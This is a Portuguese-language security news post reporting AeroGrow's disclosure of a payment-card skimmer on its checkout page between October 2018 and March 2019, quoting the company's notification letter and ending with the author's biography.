A AeroGrow notificou recentemente os clientes sobre uma violação de dados de cartões de pagamento. O incidente impactou o site da empresa.
“On March 4, 2019, AeroGrow learned that an unauthorized person may have acquired, through the use of malicious code, the payment card information that users entered into the eCommerce vendor’s payment page.” reads the data breach notification letter sent to the affected customers. “Upon learning of the incident, we immediately removed the malicious code and secured the website.”
A carta também foi enviada ao California Office of the Attorney General. A AeroGrow descobriu que os invasores injetaram um skimmer na página de pagamento do website.
O código malicioso permaneceu sem ser detectado entre 29 de outubro de 2018 e 4 de março de 2019.
O skimmer conseguiu extrair o número do cartão, a data de validade e o código CVV / CCV fornecidos pelos clientes durante o processo de pagamento.
Números de segurança social, PINs de cartão ou outras informações de contas financeiras não foram expostos porque a empresa não os solicitava. Geralmente os skimmers apenas recolhem dados relativos a cartões de crédito.
A empresa anunciou que tomou medidas para proteger os seus sistemas, e oferecerá um ano de serviços gratuitos de proteção de identidade para indivíduos impactados através da Experian.
“AeroGrow takes seriously both the security of your payment card information and this incident. We have informed law enforcement and will cooperate with their investigation. We have not delayed notifying you at the request of law enforcement.” continues the letter.
“In addition, we have taken the appropriate steps to limit the likelihood of a recurrence, and we have engaged a third-party expert to conduct a thorough review of our security protocols. Out of an abundance of caution, AeroGrow is offering you one year of identity protection services at no cost to you through Experian, one of the three nationwide credit bureaus.”
A AeroGrow comunicou outra violação envolvendo cartões de pagamento em 2015, também nesse caso os atacantes usaram um skimmer para roubar dados do cartão.
Pedro Tavares is a professional in the field of information security working as an Ethical Hacker/Pentester, Malware Researcher and also a Security Evangelist. He is also a founding member at CSIRT.UBI and Editor-in-Chief of the security computer blog seguranca-informatica.pt.
In recent years he has invested in the field of information security, exploring and analyzing a wide range of topics, such as pentesting (Kali Linux), malware, exploitation, hacking, IoT and security in Active Directory networks. He is also Freelance Writer (Infosec. Resources Institute and Cyber Defense Magazine) and developer of the 0xSI_f33d – a feed that compiles phishing and malware campaigns targeting Portuguese citizens.
Read more here.